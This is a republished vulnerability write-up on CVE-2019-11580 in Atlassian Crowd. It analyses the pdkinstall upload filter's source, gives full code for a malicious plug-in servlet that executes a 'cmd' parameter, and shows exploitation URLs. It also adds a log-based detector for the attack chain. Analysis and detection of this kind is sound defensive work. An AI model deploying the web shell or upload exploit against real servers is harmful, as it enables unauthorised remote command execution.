
How to analyze CVE-2019-11580 vulnerabilities in FireEye

2025-01-21 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article explains how to analyze CVE-2019-11580, one of the vulnerabilities covered by FireEye's published response material. The content is quite detailed; interested readers can use it for reference, and I hope it is helpful to you.

Preface

FireEye, a leading global cyber security company, is suspected of having been attacked by an APT group. A large amount of its government customers' information was accessed without authorization, and its red team tools were stolen. Although it is not yet clear what will be done with these red team tools, FireEye has published response material on GitHub. Qianxin Code Security Lab will analyze and reproduce the relevant vulnerabilities from that GitHub repository from a technical point of view, hoping to give readers some insight and help them build good defenses.

Attackers can abuse code execution vulnerabilities to run arbitrary code on the server side and, for example, steal system information, which causes great harm. Atlassian Crowd is an enterprise identity management application that provides identity management and single sign-on, and whose functionality is extended through plug-ins. There is a security flaw in Atlassian Crowd's pdkinstall plug-in that lets an attacker upload and install a malicious plug-in and thereby achieve remote code execution.

Code analysis

This section analyzes the pdkinstall plug-in of Atlassian Crowd. Run [git clone https://bitbucket.org/atlassian/pdkinstall-plugin] to download the plug-in source code and open it in IDEA, as shown below.

First, look at the plug-in descriptor [atlassian-plugin.xml]. This XML file declares the plug-in's modules and the servlet filter they are bound to; its content is as follows.

The area highlighted in red in the figure shows that requests to /admin/uploadplugin.action are handled by the filter class com.atlassian.pdkinstall.PdkInstallFilter, which performs the upload, checking and installation of a new plug-in. We therefore treat this class as the entry point of the security flaw.

Next, analyze its source code. The core function is doFilter(), which contains the key plug-in control logic, so we go through it in two parts. The source code of part 1, with commentary, is as follows.

```java
public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain)
        throws IOException, ServletException {
    HttpServletRequest req = (HttpServletRequest) servletRequest;
    HttpServletResponse res = (HttpServletResponse) servletResponse;

    // an error is returned if the request is not a POST
    if (!req.getMethod().equalsIgnoreCase("post")) {
        res.sendError(HttpServletResponse.SC_BAD_REQUEST, "Requires post");
        return;
    }

    // check whether the body is in multipart format.
    // in the request, Content-Type indicates the MIME type of the body; the multipart/mixed type
    // is mainly used to transfer data files (binary data, etc.).
    // Check that we have a file upload request
    File tmp = null;
    boolean isMultipart = ServletFileUpload.isMultipartContent(req);
    if (isMultipart) {
        // extract the jar file directly from the request body and go on to install the plug-in
        tmp = extractJar(req, res, tmp);
    } else {
        // assemble the jar from the fields in the request body and install the plug-in
        tmp = buildJarFromFiles(req);
    }
    // ... continued in part 2 below
```

This method first accepts only POST requests, then checks whether the Content-Type of the request is multipart: if so, the jar plug-in is extracted directly from the request body; otherwise, the jar plug-in is assembled from the request fields and installed.

Because the rest of the function branches on the tmp variable, we need to look at what the called functions return in tmp. Enter extractJar() to analyze how the jar plug-in is extracted, as follows; buildJarFromFiles() works similarly and is not repeated here.

```java
private File extractJar(HttpServletRequest req, HttpServletResponse res, File tmp) throws IOException {
    // Create a new file upload handler
    ServletFileUpload upload = new ServletFileUpload(factory);
    // Parse the request
    try {
        // the newly created upload handler parses the request body, i.e. the multipart-encoded plug-in
        List<FileItem> items = upload.parseRequest(req);
        for (FileItem item : items) {
            // if the field name begins with "file_" and it is not a form field, the part is treated as
            // the plug-in: a temp file is created on the server, and its location is kept in tmp
            if (item.getFieldName().startsWith("file_") && !item.isFormField()) {
                tmp = File.createTempFile("plugindev-", item.getName());
                tmp.renameTo(new File(tmp.getParentFile(), item.getName()));
                item.write(tmp);
            }
        }
    } catch (FileUploadException e) {
        log.warn(e, e);
        res.sendError(HttpServletResponse.SC_BAD_REQUEST, "Unable to process file upload");
    } catch (Exception e) {
        log.warn(e, e);
        res.sendError(HttpServletResponse.SC_INTERNAL_SERVER_ERROR, "Unable to process file upload");
    }
    // return the plug-in's location on the server
    return tmp;
}
```

The analysis shows that if the request contains a part whose field name starts with "file_" and which is not a form field, the plug-in is created from it and its location on the server is stored in tmp; otherwise tmp remains null. Finally, tmp is returned.

Let's move on to the second part of doFilter(), as follows.

```java
    // tmp is not null: this is a plug-in upload request and the plug-in has been received,
    // so start installing it; otherwise respond with "Missing plugin file"
    if (tmp != null) {
        List<String> errors = new ArrayList<String>();
        try {
            // install the plug-in
            errors.addAll(pluginInstaller.install(tmp));
        } catch (Exception ex) {
            log.error(ex);
            errors.add(ex.getMessage());
        }
        tmp.delete();
        if (errors.isEmpty()) {
            // installed successfully: respond with "Installed plugin" + the plug-in path
            res.setStatus(HttpServletResponse.SC_OK);
            servletResponse.setContentType("text/plain");
            servletResponse.getWriter().println("Installed plugin " + tmp.getPath());
        } else {
            // installation failed: respond with "Unable to install plugin:"
            res.setStatus(HttpServletResponse.SC_BAD_REQUEST);
            servletResponse.setContentType("text/plain");
            servletResponse.getWriter().println("Unable to install plugin:");
            for (String err : errors) {
                servletResponse.getWriter().println("\t -" + err);
            }
        }
        servletResponse.getWriter().close();
        return;
    }
    res.sendError(HttpServletResponse.SC_BAD_REQUEST, "Missing plugin file");
}
```

According to the analysis, if tmp is not null the plug-in installation starts: on success the response is "Installed plugin" followed by the plug-in path, and on failure the response is "Unable to install plugin:"; if tmp is null, the response is "Missing plugin file".

Having clarified Atlassian Crowd's plug-in installation flow, we can see that there is no mechanism for checking what an uploaded plug-in does: the filter only verifies the HTTP method and the body encoding before installing whatever was uploaded, so plug-ins are easy to abuse.

Vulnerability exploitation

First, write a malicious plug-in whose "atlassian-plugin.xml" is as follows.

(The XML tags of the descriptor did not survive extraction; only the element values remain.)

true
Atlassian Management plugin
1.0.0
/exp
Backdoor at /plugins/servlet/cdl

From the descriptor, once the plug-in has been uploaded a user only needs to visit /exp to reach the malicious plug-in's servlet class com.cdl.shell.exp.

Second, the source code of com.cdl.shell.exp is as follows:

```java
public class exp extends javax.servlet.http.HttpServlet {
    public void doGet(HttpServletRequest req, HttpServletResponse res) {
        try {
            // receive the cmd parameter
            String cmd = String.valueOf(req.getParameter("cmd"));
            String output = "";
            try {
                if (!cmd.equals("")) {
                    // execute the command given in the cmd parameter
                    Process p = Runtime.getRuntime().exec(cmd);
                    InputStream out = p.getInputStream();
                    InputStream err = p.getErrorStream();
                    int c = '\0';
                    while ((c = out.read()) != -1) {
                        res.getWriter().write((char) c);
                    }
                }
            } catch (Exception ex) {
                output += "\n" + ex.toString();
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

As can be seen, this exp servlet reads the value of the cmd parameter and executes it as a command.

Finally, craft the upload request to install the malicious plug-in, then open [http://localhost:8095/crowd/plugins/servlet/exp?cmd=whoami] in the browser to execute the "whoami" command. The server's response (below) shows that the vulnerability was exploited successfully.

Reproduction

First, download [atlassian-crowd-3.4.3]. After configuring and starting it, visit [http://localhost:8095/crowd]; the following page indicates that the Crowd service has been set up successfully.

Second, visit [https://github.com/jas502n/CVE-2019-11580] to download the malicious plug-in and other materials, then run the [CVE-2019-11580.py] script. The following output indicates that the plug-in was uploaded and installed successfully.

Third, open [http://localhost:8095/crowd/plugins/servlet/exp?cmd=whoami] in the browser. If the following page appears, the code execution vulnerability has been triggered successfully.
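As an added example (not from the original article, Qianxin or FireEye), here is a small Python detector that applies the two observations above to web-server access logs: any POST to the pdkinstall endpoint /admin/uploadplugin.action is suspect, since the filter shown earlier checks only the HTTP method and body encoding, and a later request to a plug-in servlet carrying a cmd parameter matches the malicious servlet described. The log lines, the attacker address 203.0.113.7 and the Combined Log Format layout are constructed assumptions.

```python
"""Detect the CVE-2019-11580 exploitation chain in web-server access logs (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip ident user [timestamp] "METHOD path protocol" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

UPLOAD_PATH = "/admin/uploadplugin.action"   # pdkinstall entry point (PdkInstallFilter)
SERVLET_PREFIX = "/plugins/servlet/"         # where an installed plug-in's servlets are mounted

# Constructed sample lines, not a real log; 203.0.113.7 plays the attacker.
SAMPLE_LOG = [
    '10.0.0.5 - - [31/May/2020:10:00:01 +0000] "GET /crowd/console/login.action HTTP/1.1" 200 5123',
    '203.0.113.7 - - [31/May/2020:10:00:12 +0000] "POST /crowd/admin/uploadplugin.action HTTP/1.1" 200 64',
    '203.0.113.7 - - [31/May/2020:10:00:15 +0000] "GET /crowd/plugins/servlet/exp?cmd=whoami HTTP/1.1" 200 12',
    '10.0.0.5 - - [31/May/2020:10:01:00 +0000] "GET /crowd/plugins/servlet/some-plugin?page=1 HTTP/1.1" 200 800',
]

def analyse(lines):
    """Return (severity, ip, reason) tuples for the two stages of the chain."""
    alerts = []
    uploaders = set()          # hosts that hit the upload endpoint earlier in the log
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue           # skip lines that are not in the expected format
        rec = m.groupdict()
        url = urlsplit(rec["path"])
        query = parse_qs(url.query)
        # Stage 1: the filter checks only method and body encoding, so every POST here is
        # suspect; a 200 means it answered "Installed plugin" and the plug-in is now live.
        if rec["method"] == "POST" and url.path.endswith(UPLOAD_PATH):
            sev = "critical" if rec["status"] == "200" else "high"
            alerts.append((sev, rec["ip"], f"plug-in upload via pdkinstall (HTTP {rec['status']})"))
            uploaders.add(rec["ip"])
        # Stage 2: a plug-in servlet called with a cmd parameter matches the servlet in the
        # article; escalate when the same host performed the upload.
        elif SERVLET_PREFIX in url.path and "cmd" in query:
            sev = "critical" if rec["ip"] in uploaders else "high"
            alerts.append((sev, rec["ip"], f"cmd={query['cmd'][0]!r} sent to {url.path}"))
    return alerts

if __name__ == "__main__":
    for sev, ip, why in analyse(SAMPLE_LOG):
        print(f"[{sev.upper()}] {ip}: {why}")
```

In a real deployment the context path before /admin/uploadplugin.action varies, which is why the match uses endswith() on the path rather than a fixed URL.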

Patch

Upgrade to the latest version.

From this analysis of the Atlassian Crowd RCE, the author believes the root cause of the vulnerability is that the plug-in management system does not adequately verify the safety of externally supplied plug-ins. When studying related vulnerabilities, it is worth building up dynamic debugging skills for Atlassian Crowd, plug-in analysis and development skills, and Java and Python development skills.

That is all on how to analyze the FireEye CVE-2019-11580 vulnerability. I hope the above content is of some help and that you can learn more from it. If you think the article is good, please share it so more people can see it.
